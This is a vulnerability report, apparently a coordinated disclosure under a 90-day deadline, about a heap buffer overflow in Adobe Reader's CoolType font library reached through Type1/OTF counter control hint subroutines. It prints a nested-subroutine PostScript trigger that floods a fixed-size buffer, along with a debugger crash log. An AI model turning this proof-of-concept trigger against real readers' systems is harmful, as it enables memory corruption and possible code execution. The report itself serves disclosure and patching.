In Type1 and OTF (Type2) glyph CharStrings, it is possible to provide an arbitary number of parameters to the "Counter Control Hint" mechanism, using the special "othersubr 12" functionality to pass the data in packets of max. 22 integers, completed by a "othersubr 13" call with the remaining <= 22 arguments. To learn more about the mechanism, see section "Counter Control Hints" of [1].
Considering that the code responsible for implementing the special 12/13 subroutines found in the CoolType font library used by Adobe Reader does not perform any bounds checking, it is possible to overflow the constant-size heap-based buffer, thus corrupting heap headers and adjacent allocations. Such memory corruption can be potentially used to take over code execution flow and compromise system security.
It is not necessary to have thousands of othersubr 12 calls present in the font in verbatim to trigger the condition (although this is also feasible) - the font size can be greatly reduced by using nested subroutine calls to perform the attack. For example, the snippet of PostScript code shown below (consisting of 5 subroutines) inserts as many as 22 * (16 ^ 4) = 1441792 dwords of value 0x41414141 into the destination buffer:
---
dup 110 ## -| { 1094795585 1094795585 1094795585 1094795585
1094795585 1094795585 1094795585 1094795585
1094795585 1094795585 1094795585 1094795585
1094795585 1094795585 1094795585 1094795585
1094795585 1094795585 1094795585 1094795585
1094795585 1094795585 22 12 callother return } |
dup 111 ## -| { 0 6 callother
110 callsubr 110 callsubr 110 callsubr 110 callsubr
110 callsubr 110 callsubr 110 callsubr 110 callsubr
110 callsubr 110 callsubr 110 callsubr 110 callsubr
110 callsubr 110 callsubr 110 callsubr 110 callsubr
return } |
dup 112 ## -| { 0 6 callother
111 callsubr 111 callsubr 111 callsubr 111 callsubr
111 callsubr 111 callsubr 111 callsubr 111 callsubr
111 callsubr 111 callsubr 111 callsubr 111 callsubr
111 callsubr 111 callsubr 111 callsubr 111 callsubr
return } |
dup 113 ## -| { 0 6 callother
112 callsubr 112 callsubr 112 callsubr 112 callsubr
112 callsubr 112 callsubr 112 callsubr 112 callsubr
112 callsubr 112 callsubr 112 callsubr 112 callsubr
112 callsubr 112 callsubr 112 callsubr 112 callsubr
return } |
dup 114 ## -| { 0 6 callother
113 callsubr 113 callsubr 113 callsubr 113 callsubr
113 callsubr 113 callsubr 113 callsubr 113 callsubr
113 callsubr 113 callsubr 113 callsubr 113 callsubr
113 callsubr 113 callsubr 113 callsubr 113 callsubr
return } |
---
Since the resulting number of bytes is much greater than the size of destination buffer, the code leads to the Adobe Reader process crash, reliably illustrating the problem. An example crash summary is shown below, while a full version can be found in "crash.txt".
---
(f44.5a0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=00000012 ecx=090f5000 edx=00000004 esi=0049d34c edi=090c7524
eip=6e0425cc esp=0049cd60 ebp=0049d428 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206
CoolType!CTInit+0x407c5:
6e0425cc 8901 mov dword ptr [ecx],eax ds:002b:090f5000=????????
---
Adobe Reader 11.0.10 is confirmed to be affected, but we expect all prior versions of the software to be prone to the bug, too. The issue can be reproduced with both Type1 and OTF fonts. A Type1 Proof of Concept font is attached ("poc.pfm" + "poc.pfb"), together with its source code to be compiled with the type1 tool ("poc.pfa"), and an actual PDF file with the offending font file embedded.
This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.
References:
[1] "Type 1 Font Format Supplement, Technical Specification #5015, 15 May 1994", http://partners.adobe.com/public/developer/en/font/5015.Type1_Supp.pdf
